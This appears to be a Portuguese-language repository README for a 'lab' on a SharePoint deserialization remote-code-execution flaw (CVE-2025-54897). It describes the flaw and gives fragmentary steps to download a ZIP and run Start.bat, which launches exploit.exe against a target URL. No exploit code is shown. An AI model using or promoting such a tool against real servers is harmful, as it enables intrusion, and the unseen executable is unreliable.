
Laboratório educacional que demonstra uma vulnerabilidade de desserialização no Microsoft SharePoint que permite execução remota de código, com uma interface prática de exploração para testes autorizados.
Este laboratório demonstra uma vulnerabilidade de desserialização no Microsoft Office SharePoint que permite execução remota de código (RCE). O problema surge do tratamento inadequado de dados serializados não confiáveis nas rotinas de desserialização de objetos do SharePoint, permitindo que um atacante autenticado execute código arbitrário no servidor de destino. Com uma pontuação CVSSv3 de 8.8, esta vulnerabilidade de alta gravidade afeta várias versões do SharePoint, incluindo Enterprise Server 2016, Server 2019 e Subscription Edition. A exploração bem-sucedida pode levar à exfiltração de dados, escalonamento de privilégios ou comprometimento total do sistema em ambientes de rede.
Este laboratório envolve simulações de execução de código potencialmente prejudiciais. Use apenas em ambientes isolados e não produtivos. Não implante em sistemas ou redes ativos sem autorização adequada. Os autores se isentam de qualquer responsabilidade por uso indevido, danos ou consequências legais decorrentes deste repositório. Sempre siga as diretrizes de hacking ético e obtenha permissão explícita antes de testar em qualquer sistema.
Apenas para Fins Educacionais: Este repositório é fornecido exclusivamente para aprender sobre vulnerabilidades de software e práticas de codificação segura. Não se destina a facilitar acesso não autorizado, ataques ou quaisquer atividades ilegais.
Baixe os recursos do laboratório como um arquivo ZIP no seguinte link: Download Lab ZIP.
Para instalar:
C:\cve-2025-54897-lab).dotnet --version no Prompt de Comando.Start.bat para iniciar o exploit.exe. Isso abrirá a interface de exploração em uma janela de console.http://localhost:80 para testes locais).Para perguntas ou contribuições, envie um e-mail para [email protected]